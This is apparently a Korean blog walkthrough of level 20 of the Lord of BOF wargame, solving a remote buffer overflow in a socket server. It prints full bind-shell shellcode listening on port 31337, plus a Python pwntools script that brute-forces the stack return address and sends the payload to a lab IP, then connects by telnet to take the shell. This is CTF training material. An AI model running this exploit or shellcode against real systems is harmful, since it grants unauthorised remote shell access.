[Level20] xavius -> death_knight

코드를 보니 soket 통신을 하는 코드인거 같습니다.

위에 있는건 서버를 열기위한 코드이고 실제 bof가 일어나는 부분은 저부분입니다. 

단순한 bof 가 일어나는걸 볼수 있습니다. 다만 remote bof는 주소값을 알수 없어요.... 그래서 무차별 대입으로 buffer의 주소값을 맞춰야 한다는.....

그리고 여기서 쓰는 shellcode는 평소에 쉘을 띄우는 쉘코드와 달리 31337 포트를 열어서 거기서 명령어를 실행 시킬수 있도록 하는 그런 쉘코드를 사용해야 합니다

사용할 shellcode는

---

\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80

---

가 될겁니다. 겁나 기네요 ,,,,

그리고 공격은 python 으로 할거에요!

#exploit.py

from pwn import *
shell = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"

IP  = "192.168.183.134"
PORT = 6666
for i in range(0xFF, 0x00, -1):
        for j in range(0xFF, 0x00, -50):
                s=remote(IP,PORT)
                s.send("A"*44+chr(j)+chr(i)+"\xff\xbf"+'\x90'*100+shell)
                print s.recv(1024)

                s.close()

(j 의 증가폭이 -50 인 이유는 -1로 해봤더니 너무 오래 걸려서 짜피 앞에 NOP 넣을거 살짝 늘려도 되지 않을까 싶어서 -50 으로 잡았더니 되더라고요,,)

이렇게 작성 하시고 실행시키면 주르르르르르르르르륵 무차별 대입이 될거에요!

그리고

---

telnet [IP주소] 31337

---

하셔서 접속 하시면 아무일도 안일어 납니다! 아무것도 안 입력했으니...

거기다 

id;

my-pass;

하시면 됩니다.

클리어...!

그리고 이어서 저기로 접속해 봅시다

그러면  txt 파일이 있는데

그걸 보면....! 

Red Hat LOB 클리어.....!

이젠 페도라 성으로 떠나봅시다! (아마)